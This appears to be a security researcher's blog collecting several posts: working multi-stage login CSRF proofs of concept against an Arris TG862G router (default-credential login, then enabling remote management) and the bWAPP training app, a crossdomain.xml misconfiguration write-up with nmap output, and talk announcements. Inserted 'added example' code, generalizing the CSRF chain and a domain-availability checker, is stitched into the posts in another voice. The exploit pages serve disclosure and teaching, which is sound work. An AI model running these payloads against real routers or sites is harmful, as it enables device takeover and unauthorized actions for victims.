<div style="margin: 0in;">
<span style="font-family: inherit;"><a href="http://www.amazon.com/The-Web-Application-Hackers-Handbook/dp/1118026470" target="_blank">The Web Application Hacker's Handbook, 2nd edition</a>, page 507 (2011):</span></div>
<div style="margin: 0in;">
<br /></div>
<span style="font-family: Courier New, Courier, monospace;">If the device's web interface uses forms-based authentication, it is often possible to perform a two-stage attack by first logging the user in to the device and then performing the authenticated action. Since most users do not modify the default credentials for devices of this kind (perhaps on the assumption that the web interface can be accessed only from the internal home network), the attacker's web page can first issue a login request containing default credentials. The device then sets a session token in the user's browser, which is sent automatically in subsequent requests, including those generated by the attacker. </span> <br />
<div style="margin: 0in;">
<span style="font-family: inherit; font-size: x-small;"><br /></span></div>
<div style="margin: 0in;">
<span style="font-family: inherit;">This was also discussed around the same time by Jeremiah Blatz at McAfee Foundstone in 2011, in a white paper titled </span><a href="http://www.mcafee.com/us/resources/white-papers/wp-csrf-attack-defense.pdf" style="font-family: inherit;">CSRF: Attack and Defense</a><span style="font-family: inherit;">. Here is an excerpt: </span><br />
<span style="font-family: inherit;"><br /></span></div>
<span style="font-family: Courier New, Courier, monospace;">Many web-enabled devices ship with default user accounts, with well-known usernames and passwords. An attacker can exploit this to use CSRF to attempt to log users into the target website before performing a real CSRF attack. This is of particular concern for routers, which tend to have predictable IP addresses. Changing the default password on these devices prevents attackers from performing a CSRF login operation.</span> <br />
<br />
So people have been talking about this for years, but the question is: <i>How do I actually pull this off? </i>There are not a lot of public examples out there, so I figured I would share the solution that I came up with, along with some other examples. <br />
<h3>
Multi-Stage CSRF background</h3>
<div>
This is very closely related to <a href="http://www.lanmaster53.com/2013/07/multi-post-csrf/" target="_blank">multi-POST CSRF</a>; the difference is that multi-POST CSRF fires all of the requests at the same time. Lanmaster53's technique in particular is great if you need to do multiple things at once, but unfortunately it is not what we need if the requests are time or sequence sensitive. </div>
<div>
<br /></div>
You want to pull multi-stage CSRF out of the arsenal when you need the victim to submit multiple requests -- in order -- on your behalf. There are multiple scenarios where this method will give you an overall better exploit, not just with Login-CSRF. The first time I had to do this on an assessment, I needed my victim to check out an item from revision control, modify it, then check it back in. If you shotgunned all three CSRFs at the same time, it would most likely not work, for obvious reasons. To accomplish that hack, I used a JavaScript timer to space out the requests, and my finished exploit was very similar to <a href="http://ceriksen.com/2012/09/29/two-stage-csrf-attacks/" target="_blank">this post by Charlie Eriksen</a>.<br />
<br />
Instead of using the timer based approach for this POC, I decided to use <b>XMLHttpRequest</b> combined with <b>onreadystatechange</b>. I'll show the Arris POC first, and then I'll include a POC for launching this attack against bWAPP, an intentionally vulnerable web application, so that you can try it for yourself. <br />
<br />
<h2>
Arris POC</h2>
So now we have all the pieces to do something evil. The following will work if the victim has an Arris TG862G and has not changed the default password on it:<br />
<br />
1) Victim arrives at attacker's evil site via phishing, watering hole attack, etc<br />
2) Victim is CSRFed into authenticating with the Arris TG862G with default credentials<br />
3) Victim is then CSRFed into opening up remote management of the router<br />
4) Attacker logs into router with default credentials from the internet<br />
<br />
Here is the CSRF source served by the attacker (arris-MultiStage.html):<br />
<br />
<div style="background: #f0f0f0; border-width: .1em .1em .1em .1em; border: solid gray; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #062873; font-weight: bold;"><html></span>
<span style="color: #062873; font-weight: bold;"><head></span>
<span style="color: #062873; font-weight: bold;"><script></span>
<span style="color: #007020; font-weight: bold;">function</span> submitRequest1()
{
<span style="color: #007020; font-weight: bold;">var</span> xhr <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">new</span> XMLHttpRequest();
xhr.open(<span style="color: #4070a0;">"POST"</span>, <span style="color: #4070a0;">"https://10.0.0.1/home_loggedout.php"</span>, <span style="color: #007020; font-weight: bold;">true</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Accept"</span>, <span style="color: #4070a0;">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Accept-Language"</span>, <span style="color: #4070a0;">"en-US,en;q=0.5"</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Content-Type"</span>, <span style="color: #4070a0;">"application/x-www-form-urlencoded"</span>);
xhr.withCredentials <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">true</span>;
<span style="color: #007020; font-weight: bold;">var</span> body <span style="color: #666666;">=</span> <span style="color: #4070a0;">"username=admin&password=password"</span>;
<span style="color: #007020; font-weight: bold;">var</span> aBody <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">new</span> Uint8Array(body.length);
<span style="color: #007020; font-weight: bold;">for</span> (<span style="color: #007020; font-weight: bold;">var</span> i <span style="color: #666666;">=</span> <span style="color: #40a070;">0</span>; i <span style="color: #666666;"><</span> aBody.length; i<span style="color: #666666;">++</span>)
aBody[i] <span style="color: #666666;">=</span> body.charCodeAt(i);
xhr.onreadystatechange <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">function</span>()<span style="line-height: 125%;">{</span></pre>
<pre style="line-height: 125%; margin: 0;"> <span style="color: #007020; font-weight: bold;">if</span>(xhr.readyState <span style="color: #666666;">==</span> <span style="color: #40a070;">4</span>){
submitRequest2();
}
}
xhr.send(<span style="color: #007020; font-weight: bold;">new</span> Blob([aBody]));
}
<span style="color: #007020; font-weight: bold;">function</span> submitRequest2()
{
<span style="color: #007020; font-weight: bold;">var</span> xhr <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">new</span> XMLHttpRequest();
xhr.open(<span style="color: #4070a0;">"POST"</span>, <span style="color: #4070a0;">"https://10.0.0.1/remote_management"</span>, <span style="color: #007020; font-weight: bold;">true</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Accept"</span>, <span style="color: #4070a0;">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Accept-Language"</span>, <span style="color: #4070a0;">"en-US,en;q=0.5"</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Content-Type"</span>, <span style="color: #4070a0;">"application/x-www-form-urlencoded"</span>);
xhr.withCredentials <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">true</span>;
<span style="color: #007020; font-weight: bold;">var</span> body <span style="color: #666666;">=</span> <span style="color: #4070a0;">"http_port=8080&http=enabled&single=any"</span>;
<span style="color: #007020; font-weight: bold;">var</span> aBody <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">new</span> Uint8Array(body.length);
<span style="color: #007020; font-weight: bold;">for</span> (<span style="color: #007020; font-weight: bold;">var</span> i <span style="color: #666666;">=</span> <span style="color: #40a070;">0</span>; i <span style="color: #666666;"><</span> aBody.length; i<span style="color: #666666;">++</span>)
aBody[i] <span style="color: #666666;">=</span> body.charCodeAt(i);
xhr.send(<span style="color: #007020; font-weight: bold;">new</span> Blob([aBody]));
}
<span style="color: #062873; font-weight: bold;"></script></span>
<span style="color: #062873; font-weight: bold;"></head></span>
<span style="color: #062873; font-weight: bold;"><body</span> <span style="color: #4070a0;">onload="submitRequest1();"</span><span style="color: #062873; font-weight: bold;">></span></pre>
<pre style="line-height: 125%; margin: 0;"><span style="color: #062873; font-weight: bold;"><img</span> <span style="color: #4070a0;">src="distraction.jpg"</span> <span style="color: #4070a0;">alt="Nothing to see here"</span><span style="color: #062873; font-weight: bold;">></span>
<span style="color: #062873; font-weight: bold;"></body></span>
<span style="color: #062873; font-weight: bold;"></html></span>
</pre>
</div>
<br />
The way this works is that the <b>body onload</b> at the very bottom calls the first function, submitRequest1(), which launches the login request. The <b>onreadystatechange</b> handler inside submitRequest1() calls the second function, submitRequest2(), but only after the <a href="http://www.w3schools.com/ajax/ajax_xmlhttprequest_onreadystatechange.asp">first request has finished and the response is ready</a>. readyState reaches 4 whether or not the script was allowed to read the cross-origin response, so the chain continues even though the browser hides the login response from the page. Once submitRequest2() is called, the second CSRF request is made. The important thing to note is that the browser stored the session cookie set by the login response and, because <b>withCredentials</b> is true, attaches it to the second request; the second request therefore carries the post-authentication session, which is why it succeeds. One caveat for anyone reproducing this today: the technique relies on the device's session cookie being sent on a cross-site request, and Chromium-based browsers (since Chrome 80) treat cookies without a SameSite attribute as Lax, which excludes them from cross-site XMLHttpRequest and fetch calls, so the cookie's SameSite behaviour now decides whether the chained request is authenticated. <br />
<br />
A quick side note before moving on: You could easily add the onreadystatechange lines to submitRequest2(), and point that to submitRequest3(), and so on. <br />
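As an added example, not code from the original post, the following generalizes the two-function pattern above into a sequencer that takes an ordered list of steps and sends each one only after the previous one has completed, using fetch in no-cors mode with credentials included (the modern equivalent of the XMLHttpRequest/withCredentials pair used above). The device URLs, form fields and the fake device are placeholders for this example; the fake device models the victim's cookie jar so the file can run offline in Node and show that the same two requests fail when sent in the wrong order.

```javascript
// Added example (not the original post's code): a generic multi-stage CSRF
// sequencer. Steps run strictly in order; step N+1 starts only after step N
// has completed (successfully or not). Endpoints and fields are placeholders.

const STEPS = [
  { method: 'POST', url: 'https://router.example/login',
    body: new URLSearchParams({ username: 'admin', password: 'password' }).toString() },
  { method: 'POST', url: 'https://router.example/remote_management',
    body: new URLSearchParams({ http: 'enabled', http_port: '8080' }).toString() },
];

// Browser sender. mode 'no-cors' keeps the request free of a CORS preflight
// (form encoding is a "simple" content type) and makes the response opaque:
// the script cannot read it, but the browser still stores any Set-Cookie and,
// with credentials 'include', attaches the victim's cookies to each request.
function browserSend(step) {
  return fetch(step.url, {
    method: step.method,
    mode: 'no-cors',
    credentials: 'include',
    headers: step.body === null ? {} : { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: step.body,
  });
}

// Run the chain. Errors are recorded, not thrown, mirroring readyState 4
// firing for both a readable and a blocked response in the XHR version.
async function runChain(steps, send = browserSend) {
  const log = [];
  for (let i = 0; i < steps.length; i++) {
    let outcome = 'sent';
    try { await send(steps[i]); } catch (e) { outcome = `error: ${e.message}`; }
    log.push({ index: i, url: steps[i].url, outcome });
  }
  return log;
}

// Constructed stand-in for the target device plus the victim's cookie jar, so
// the file runs offline (e.g. under Node) and the ordering effect is visible:
// a correct login sets a session cookie; the management change is accepted
// only when that cookie is present.
function makeFakeDevice() {
  const jar = {};
  const device = { remoteMgmt: false, accepted: [] };
  async function send(step) {
    await new Promise(r => setTimeout(r, 5));           // simulated network delay
    const params = new URLSearchParams(step.body || '');
    if (step.url.endsWith('/login')) {
      if (params.get('username') === 'admin' && params.get('password') === 'password') {
        jar.session = 'tok123';                           // Set-Cookie stored by the browser
      }
    } else if (step.url.endsWith('/remote_management')) {
      if (jar.session === 'tok123') {                     // cookie sent with the request
        device.remoteMgmt = params.get('http') === 'enabled';
        device.accepted.push(step.url);
      }
    }
  }
  return { send, device, jar };
}

// Same two requests, in order and reversed: only the ordered chain succeeds,
// which is why firing every request at once is not enough for login CSRF.
async function demo() {
  const ordered = makeFakeDevice();
  const orderedLog = await runChain(STEPS, ordered.send);
  const reversed = makeFakeDevice();
  const reversedLog = await runChain([STEPS[1], STEPS[0]], reversed.send);
  return {
    ordered: { log: orderedLog, remoteMgmt: ordered.device.remoteMgmt },
    reversed: { log: reversedLog, remoteMgmt: reversed.device.remoteMgmt },
  };
}

demo().then(r => console.log(JSON.stringify(r, null, 2)));
```

In a browser payload you would drop the fake device and call runChain(STEPS) from the page's onload, exactly where the original calls submitRequest1(); adding a third or fourth stage is then a matter of appending to STEPS rather than nesting another callback.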
<br />
In terms of the severity of this exploit, remember that the attacker could just look through their web logs to determine the public IP of people who fell victim to the attack. At that point, it is just a matter of connecting to the public IP on port 8080/tcp, and seeing if they can log in with the default credentials. <br />
<br />
Lastly, before moving away from Arris/Comcast, I wanted to remind everyone that both the CSRF and XSS I reported on back in July have been fixed, and the fix has been pushed out by Comcast.<br />
<span style="font-family: inherit;"><br /></span>
If you have an Arris modem/router but do not use Comcast, contact your ISP (or Arris) to verify that your firmware has been updated to address this vulnerability. Or you could fire up Burp and see for yourself. ;) <br />
<span style="font-family: inherit;"><br /></span>
<br />
<h2>
bWAPP POC</h2>
<a href="http://www.itsecgames.com/">bWAPP</a> is an intentionally vulnerable web application, and it is a perfect place to try out multi-stage CSRF on something you can easily download and that you know is vulnerable.<br />
<br />
1) Log in to bWAPP and pick the CSRF Transfer Amount module:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-_FIoltX6SSY/VJiRC_sy7PI/AAAAAAAAAUw/TtGhVOgj_Tg/s1600/1pick-csrf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-_FIoltX6SSY/VJiRC_sy7PI/AAAAAAAAAUw/TtGhVOgj_Tg/s1600/1pick-csrf.png" height="192" width="320" /></a></div>
2) Verify the current value (1000 EUR):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-1ZShOK3Ybzo/VJiRU1Cd43I/AAAAAAAAAU4/UrBdLY55Grs/s1600/csrf-pre.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-1ZShOK3Ybzo/VJiRU1Cd43I/AAAAAAAAAU4/UrBdLY55Grs/s1600/csrf-pre.png" height="312" width="320" /></a></div>
3) Log out! <--- This is normally what would prevent CSRF from working: if the user is logged out, an ordinary CSRF attack is not going to work.<br />
<br />
4) Have the victim navigate to the attacker's server and load the CSRF payload:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-dfOOlFeYm4c/VJiUccYxaLI/AAAAAAAAAVE/t-KI0FVvo3k/s1600/csrf-attackerbox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-dfOOlFeYm4c/VJiUccYxaLI/AAAAAAAAAVE/t-KI0FVvo3k/s1600/csrf-attackerbox.png" height="83" width="320" /></a></div>
5) Navigate back to https://172.16.214.132/bWAPP/csrf_2.php. You should be logged in (magic), and you should see that 10 EUR has been removed from the account:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-8xvLOvpOCME/VJiUykLvybI/AAAAAAAAAVM/cIse2hPPgKA/s1600/4-csrf-finished.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-8xvLOvpOCME/VJiUykLvybI/AAAAAAAAAVM/cIse2hPPgKA/s1600/4-csrf-finished.png" height="314" width="320" /></a></div>
<br />
Here is the code:<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #f0f0f0; border-width: .1em .1em .1em .1em; border: solid gray; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #062873; font-weight: bold;"><html></span>
<span style="color: #062873; font-weight: bold;"><head></span>
<span style="color: #062873; font-weight: bold;"><script></span>
<span style="color: #007020; font-weight: bold;">function</span> submitRequest1()
{
<span style="color: #007020; font-weight: bold;">var</span> xhr <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">new</span> XMLHttpRequest();
xhr.open(<span style="color: #4070a0;">"POST"</span>, <span style="color: #4070a0;">"https://172.16.214.132/bWAPP/login.php"</span>, <span style="color: #007020; font-weight: bold;">true</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Accept"</span>, <span style="color: #4070a0;">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Accept-Language"</span>, <span style="color: #4070a0;">"en-US,en;q=0.5"</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Content-Type"</span>, <span style="color: #4070a0;">"application/x-www-form-urlencoded"</span>);
xhr.withCredentials <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">true</span>;
<span style="color: #007020; font-weight: bold;">var</span> body <span style="color: #666666;">=</span> <span style="color: #4070a0;">"login=bee&password=bug&security_level=0&form=submit"</span>;
<span style="color: #007020; font-weight: bold;">var</span> aBody <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">new</span> Uint8Array(body.length);
<span style="color: #007020; font-weight: bold;">for</span> (<span style="color: #007020; font-weight: bold;">var</span> i <span style="color: #666666;">=</span> <span style="color: #40a070;">0</span>; i <span style="color: #666666;"><</span> aBody.length; i<span style="color: #666666;">++</span>)
aBody[i] <span style="color: #666666;">=</span> body.charCodeAt(i);
xhr.onreadystatechange <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">function</span>(){
<span style="color: #007020; font-weight: bold;">if</span>(xhr.readyState <span style="color: #666666;">==</span> <span style="color: #40a070;">4</span>){
submitRequest2();
}
}
xhr.send(<span style="color: #007020; font-weight: bold;">new</span> Blob([aBody]));
}
<span style="color: #007020; font-weight: bold;">function</span> submitRequest2()
{
<span style="color: #007020; font-weight: bold;">var</span> xhr <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">new</span> XMLHttpRequest();
xhr.open(<span style="color: #4070a0;">"GET"</span>, <span style="color: #4070a0;">"https://172.16.214.132/bWAPP/csrf_2.php?account=123-45678-90&amount=10&action=transfer"</span>, <span style="color: #007020; font-weight: bold;">true</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Accept"</span>, <span style="color: #4070a0;">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Accept-Language"</span>, <span style="color: #4070a0;">"en-US,en;q=0.5"</span>);
xhr.withCredentials <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">true</span>;
<span style="color: #007020; font-weight: bold;">var</span> body <span style="color: #666666;">=</span> <span style="color: #4070a0;">""</span>;
<span style="color: #007020; font-weight: bold;">var</span> aBody <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">new</span> Uint8Array(body.length);
<span style="color: #007020; font-weight: bold;">for</span> (<span style="color: #007020; font-weight: bold;">var</span> i <span style="color: #666666;">=</span> <span style="color: #40a070;">0</span>; i <span style="color: #666666;"><</span> aBody.length; i<span style="color: #666666;">++</span>)
aBody[i] <span style="color: #666666;">=</span> body.charCodeAt(i);
xhr.send(<span style="color: #007020; font-weight: bold;">new</span> Blob([aBody]));
}
<span style="color: #062873; font-weight: bold;"></script></span>
<span style="color: #062873; font-weight: bold;"></head></span>
<span style="color: #062873; font-weight: bold;"><body</span> <span style="color: #4070a0;">onload="submitRequest1();"</span><span style="color: #062873; font-weight: bold;">></span>
<span style="color: #062873; font-weight: bold;"></body></span>
<span style="color: #062873; font-weight: bold;"></html></span>
</pre>
</div>
<br />
That's it. I hope this POC will come in handy next time you need to demonstrate how bad CSRF could be. I know most developers/companies will fix CSRF as soon as you tell them it is vulnerable, but sometimes, a one click exploit is worth a thousand words!Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-21780012555028067152014-11-18T16:48:00.000-05:002014-12-14T01:01:51.268-05:00Crossdomain.xml can be overly permissive even without a wildcard (*)Before too much time passes, I want to write about a point I covered in my presentation that is not widely covered on the web -- or maybe not even covered at all. The main point is that even if you have a very specific list of domains that you trust, you may still be vulnerable to <a href="https://cwe.mitre.org/data/definitions/942.html" target="_blank">CWE-942</a>, if one of the domains that you trust is available for purchase.<br />
<br />
To illustrate this point in my talk, I used the crossdomain.xml file at www.sears.com:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-JjNEyhR2bYQ/VGu7Awewp4I/AAAAAAAAATY/K3Z6RnAJigY/s1600/pasted-image-4730.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-JjNEyhR2bYQ/VGu7Awewp4I/AAAAAAAAATY/K3Z6RnAJigY/s1600/pasted-image-4730.png" height="598" width="640" /></a></div>
<span id="goog_149566982"></span><span id="goog_149566983"></span><br />
<br />
What I found in my research is that there are plenty of crossdomain.xml files that trust sites that are available for purchase. <b>As far as I know, every single security assessment tool out there would pass right over these sites, missing the fact that a vulnerable configuration could be in place. </b><br />
<br />
In the case of www.sears.com, they are trusting the domain: searstestsite.com. For the purpose of demonstrating the vulnerability, I purchased this domain. This means that I can now host a malicious SWF at www.searstestsite.com, a domain that I own and operate, and anyone who is authenticated with www.sears.com, who also navigates to my site, will execute my malicious SWF.<br />
<br />
When I realized this is actually somewhat common, I wrote an nmap script to parse crossdomain.xml files and help you (the tester) determine if any of the trusted domains are available for purchase:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-ZHNuFnhGfb8/VGu7icwZXfI/AAAAAAAAATw/egwLQUXTByM/s1600/pasted-image-7192.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-ZHNuFnhGfb8/VGu7icwZXfI/AAAAAAAAATw/egwLQUXTByM/s1600/pasted-image-7192.png" height="378" width="640" /></a></div>
<br />
<br />
You can then paste the results into https://www.dynadot.com/domain/bulk-search.html, like so:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-eTfUrKwRi8c/VGu7SFe35LI/AAAAAAAAATk/XQaTxyFk13c/s1600/pasted-image-3390.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-eTfUrKwRi8c/VGu7SFe35LI/AAAAAAAAATk/XQaTxyFk13c/s1600/pasted-image-3390.png" height="450" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
and if you are lucky, you will get a valid hit like I did:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-3JcIS0drIoE/VGu7RoPUqII/AAAAAAAAATg/dqPbxJtB7pg/s1600/pasted-image-3396.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-3JcIS0drIoE/VGu7RoPUqII/AAAAAAAAATg/dqPbxJtB7pg/s1600/pasted-image-3396.png" height="440" width="640" /></a></div>
<br />
<br />
At the time of my talks, I still had not yet found a domain service that allows you to make automated requests without an API key. Since then, while it is still not a 100% perfect solution, I have found a site that will give us what we need for the 10-15 most common TLDs: <a href="http://instantdomainsearch.com/">instantdomainsearch.com</a>.<br />
<br />
So now, if you run my nmap script with <i>--script-args=liveLookup</i>, the script will attempt to look up the domain availability for every trusted domain whose TLD can be checked. For domains that are not available, there is no need to tell the user about them. For the ones that are available, the script makes it very clear that the domain is available for purchase. Lastly, the script falls back to the original method for any domain that has a TLD unsupported by instantdomainsearch.com.<br />
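The following is an added example (JavaScript, not the author's Lua nmap script) of the same logic: it pulls the trusted domains out of a crossdomain.xml body, reduces each one to the registrable name someone could actually buy, and asks an injected availability lookup about each; names the lookup cannot answer are listed for a manual bulk search rather than dropped. The sample policy file and the availability table are constructed for the example, and the two-label suffix list is a deliberately small stand-in for the Public Suffix List.

```javascript
// Added example (not the author's nmap script): parse a crossdomain.xml body,
// collect every trusted domain, reduce each to a registrable name and ask an
// injected availability lookup whether it can be bought. Names below
// (checkCrossdomain, lookup, the sample data) are this example's own.

// Pull the domain attribute from each <allow-access-from> element. A regex is
// enough for this one flat element; use a real XML parser for anything richer.
function trustedDomains(xml) {
  const out = [];
  const re = /<allow-access-from\b[^>]*\bdomain\s*=\s*"([^"]*)"/gi;
  let m;
  while ((m = re.exec(xml)) !== null) out.push(m[1].trim().toLowerCase());
  return out;
}

// Two-label public suffixes seen in practice; without the full Public Suffix
// List this is a heuristic, so unknown cases are reported, never silenced.
const TWO_LABEL_SUFFIXES = new Set(['co.uk', 'org.uk', 'com.au', 'com.cn', 'com.hk', 'co.jp', 'com.br']);

// Reduce "*.static.example.co.uk" to the name someone could register: example.co.uk.
function registrable(domain) {
  const labels = domain.replace(/^\*\./, '').split('.').filter(Boolean);
  if (labels.length < 2) return null;
  const lastTwo = labels.slice(-2).join('.');
  if (TWO_LABEL_SUFFIXES.has(lastTwo)) return labels.length >= 3 ? labels.slice(-3).join('.') : null;
  return lastTwo;
}

// lookup(registrableDomain) -> Promise<'available'|'taken'|'unknown'>
async function checkCrossdomain(xml, lookup) {
  const domains = trustedDomains(xml);
  const report = { wildcard: domains.includes('*'), available: [], taken: [], manualCheck: [] };
  const seen = new Set();
  for (const d of domains) {
    if (d === '*') continue;                              // the obvious, already-flagged case
    if (/^\d{1,3}(\.\d{1,3}){3}$/.test(d)) continue;       // IP literal, not a purchasable name
    const r = registrable(d);
    if (r === null || seen.has(r)) continue;
    seen.add(r);
    const status = await lookup(r);
    if (status === 'available') report.available.push(r);
    else if (status === 'taken') report.taken.push(r);
    else report.manualCheck.push(r);
  }
  return report;
}

// Constructed crossdomain.xml modelled on the pattern described above: no
// wildcard, but one trusted domain is available for purchase.
const SAMPLE_XML = `<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="www.example.com" />
  <allow-access-from domain="*.example.com" secure="false"/>
  <allow-access-from domain="exampletestsite.com"/>
  <allow-access-from domain="cdn.example.co.uk"/>
  <allow-access-from domain="shop.example.xyz"/>
</cross-domain-policy>`;

// Constructed lookup standing in for a registrar availability API; TLDs the
// API does not cover answer 'unknown' and end up in the manual-check list.
const FAKE_AVAILABILITY = { 'example.com': 'taken', 'exampletestsite.com': 'available', 'example.co.uk': 'taken' };
const fakeLookup = async d => FAKE_AVAILABILITY[d] || 'unknown';

function demo() { return checkCrossdomain(SAMPLE_XML, fakeLookup); }

demo().then(r => console.log(JSON.stringify(r, null, 2)));
```

Anything in manualCheck is what you would paste into a bulk domain search by hand, which is the same fallback the nmap script takes for TLDs its lookup service does not cover.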
<br />
Here is http-crossdomain.nse in action, using the <i>liveLookup</i> script argument:<br />
<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #f0f0f0; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;">nmap -n -p 80 www.domain.com --script<span style="color: #666666;">=</span>http-crossdomain --script-args<span style="color: #666666;">=</span>liveLookup
Host is up <span style="color: #666666;">(</span>0.012s latency<span style="color: #666666;">)</span>.
PORT STATE SERVICE
80/tcp open http
| http-crossdomain:
| TRUSTED DOMAIN AVAILABLE FOR PURCHASE: domain1.com
| TRUSTED DOMAIN AVAILABLE FOR PURCHASE: domain2.com
|
| POTENTIALLY VULNERABLE <span style="color: #666666;">(</span>Requires a manual check<span style="color: #666666;">)</span>:
| Crossdomain.xml whitelists domains that could potentially be available <span style="color: #007020; font-weight: bold;">for </span>purchase.
| This script attempted to check all whitelisted domains to see <span style="color: #007020; font-weight: bold;">if </span>any of the domains
| were available. Unfortunately, the script was unable to check some domains.
| If the FQDN requires authentication and serves sensitive information, you will want
| to manually check the remaining domains by browsing to the URL below and pasting
| the comma delimited list into the Dynadot bulk domain search tool.
|
| DOMAIN LOOKUP URL: https://www.dynadot.com/domain/bulk-search.html
|
| TRUSTED DOMAINS: domain.au,domain.at,domain.be,domain.com.cn,domain.fr,domain.de,domain.com.hk,domain.in
|
| REFERENCES:
| https://cwe.mitre.org/data/definitions/942.html
| http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html
|_
</pre>
</div>
<br />
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-7807572342830620552014-10-28T23:14:00.003-04:002014-12-23T16:18:54.540-05:00BSidesDC 2014Presenting at BSidesDC was an amazing experience. I feel so lucky that we have our very own local con, and I am extremely grateful to the organizing committee and other volunteers who make this event happen. <br />
<br />
This is very similar to my DerbyCon talk; however, it is 20 minutes longer, which gave me time to walk through how to go from finding this vulnerability to exploiting it, including showing the audience how to create a POC SWF. Also, I released SWF-Server, which will give you everything you need to create your own SWF to exploit this vulnerability.<br />
<br />
<center>
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/v5DIcAtnKRU" width="560"></iframe>
</center>
<br />
<div style="text-align: left;">
Download the project here: <a href="https://github.com/sethsec/crossdomain-exploitation-framework">https://github.com/sethsec/crossdomain-exploitation-framework</a></div>
<br />
<br />
<br />
<br />Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-21802954854507842372014-10-10T15:41:00.001-04:002014-10-11T20:06:32.119-04:00DerbyCon 4.0 - SWF Seeking Lazy Admin for Cross Domain Action<b>Abstract: </b>Security misconfiguration is #5 on the OWASP 2013 Top 10. This talk shows how the misconfiguration of one file can compromise the security of an entire web application.<br />
<br />
In the talk, you'll be introduced to the crossdomain.xml file. This file determines how third-party Flash objects (SWFs) hosted on other domains can interact with your domain. Unfortunately, this file requires manual configuration on the part of the administrator, and as we all know, when manual configuration is required, mistakes happen. Sometimes administrators give up and whitelist the entire Internet in order to "make it work". This is essentially like adding an "accept all" rule on your firewall or setting your password to &lt;blank&gt;. <br />
<div>
<br /></div>
<div>
We will review how to identify the vulnerability, how to abuse it, and how to write your own SWFs that exploit the flaw. Examples of public sites that until recently contained this vulnerability will be provided, including a few from the Alexa Top 100.<br />
<div>
<span style="font-family: Arial; font-size: 12px; line-height: 15px; text-align: -webkit-center;"><br /></span></div>
<div>
<br /></div>
<center>
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/v_5dTJYjSMA" width="560"></iframe>
</center>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<br /></div>
</div>
Author: Seth Art (http://www.blogger.com/profile/05253599496757968918)
<h1>CVE-2014-2227</h1>
Published 2014-07-23<br />
<br />
